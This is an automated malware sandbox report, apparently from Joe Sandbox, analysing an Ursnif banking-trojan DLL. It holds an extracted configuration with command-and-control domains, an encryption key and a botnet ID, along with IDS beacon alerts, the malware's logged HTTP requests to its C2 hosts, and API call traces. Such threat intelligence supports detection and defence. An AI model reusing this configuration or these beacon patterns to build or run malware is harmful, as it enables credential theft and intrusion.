Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/l; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i; Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp; Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: data.dll; Virustotal: Detection: 7%
Multi AV Scanner detection for domain / URL
Source: art.microsoftsofymicrosoftsoft.at; Virustotal: Detection: 10%
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: data.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: data.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
                      Uses nslookup.exe to query domains
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machine
                      Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
                      Source: global traffic HTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Host: art.microsoftsofymicrosoftsoft.at
                      Source: global traffic HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: art.microsoftsofymicrosoftsoft.at
                      Source: Joe Sandbox View ASN Name: NETRACK-ASRU NETRACK-ASRU
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/
                      Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
                      Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/l
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/lbK
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotify:
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknown DNS traffic detected: queries for: init.icecreambob.com
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 06 Oct 2021 23:34:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.twitter.com (Twitter)
